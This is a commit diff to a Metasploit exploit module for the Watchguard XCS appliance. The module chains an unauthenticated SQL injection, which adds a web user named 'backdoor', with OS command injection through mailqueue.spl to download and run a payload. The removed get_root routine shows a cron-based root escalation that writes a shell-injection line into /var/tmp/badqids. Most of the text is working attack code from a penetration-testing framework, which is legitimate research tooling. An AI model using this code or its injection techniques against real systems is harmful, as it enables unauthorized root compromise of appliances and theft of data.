Removed privesc functionality, this has been moved to another module. Renamed module

modules/exploits/freebsd/http/watchguard_cmd_exec.rb

@@ -16,14 +16,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Watchguard XCS Unauthenticated Remote Root',
+      'Name'           => 'Watchguard XCS Remote Command Execution',
       'Description'    => %q{
-        This module exploits three seperate vulnerabilities found in the Watchguard XCS virtual appliance
-        to gain a root shell. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
+        This module exploits two seperate vulnerabilities found in the Watchguard XCS virtual appliance
+        to gain command execution. By exploiting an unauthenticated SQL injection vulnerability, a remote attacker may insert
         a valid web user into the appliance database, and login to the web interface as this user. A
-        vulnerability in the web interface allows the attack to inject operating system commands as the
-        'nobody' user. A further vulnerability in the 'FixCorruptMail' script called by root's crontab can then be exploited
-        to run a command as root within 3 minutes.
+        vulnerability in the web interface allows the attacker to inject operating system commands as the
+        'nobody' user. The watchguard_local_root module can then be used for local privesc to root.
       },
       'Author'         =>
         [
@@ -52,9 +51,8 @@ class Metasploit4 < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The target URI', '/']),
-        OptString.new('USERNAME', [true, 'Add web interface user account', 'backdoor']),
+        OptString.new('USERNAME', [true, 'Web interface user account to add', 'backdoor']),
         OptString.new('PASSWORD', [true, 'Web interface user password', 'backdoor']),
-        OptBool.new('GETROOT', [false, 'Exploit the root privesc (Takes up to 180 seconds)', true]),
         Opt::RPORT(443)
       ],
       self.class
@@ -152,15 +150,9 @@ class Metasploit4 < Msf::Exploit::Remote
     vprint_status("Chmoding payload #{downfile}...")
     send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, chmod_cmd)
 
-    if(datastore['GETROOT'] == true)
-      print_status("GETROOT set to true, we will use 'FixCorruptMail' privesc")
-      get_root(sid_cookie,filename)
-    else
-      print_status("GETROOT set to false, setting up a shell as 'nobody'")
-      exec_cmd = "/tmp/#{filename}"
-      vprint_status("Running payload #{downfile}...")
-      send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
-    end
+    exec_cmd = "/tmp/#{filename}"
+    vprint_status("Running payload #{downfile}...")
+    send_cmd_exec("/ADMIN/mailqueue.spl",sid_cookie, exec_cmd, true)
 
   end
 
@@ -233,30 +225,6 @@ class Metasploit4 < Msf::Exploit::Remote
     return true
   end
 
-  def get_root(sid_cookie,filename)
-    print_status("Rooting can take up to 3 minutes, if you want quicker access retry with GETROOT => false")
-
-    #Touch dummy file as part of privesc
-    dummy_filename = rand_text_alpha_lower(8)
-    touch_cmd="touch /tmp/#{dummy_filename}"
-    vprint_status("Creating dummy file...")
-    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, touch_cmd)
-
-    #Put the shell injection line into badqids
-    setup_privesc = "echo \"../../../../../../tmp/#{dummy_filename};/tmp/#{filename}\" > /var/tmp/badqids"
-    send_cmd_exec("/ADMIN/mailqueue.spl", sid_cookie, setup_privesc, true)
-
-    #Need both these files to exploit privesc, delete them once shell opened
-    register_file_for_cleanup("/var/tmp/badqids")
-    register_file_for_cleanup("/tmp/#{dummy_filename}")
-
-    #Wait for crontab to run vulnerable script
-    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
-    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
-    print_status("Ran out of time, should have root shell by now.")
-
-  end
-
   def generate_device_hash(cleartext_password)
     #Generates the specific hashes needed for the XCS
     pre_salt = "BorderWare "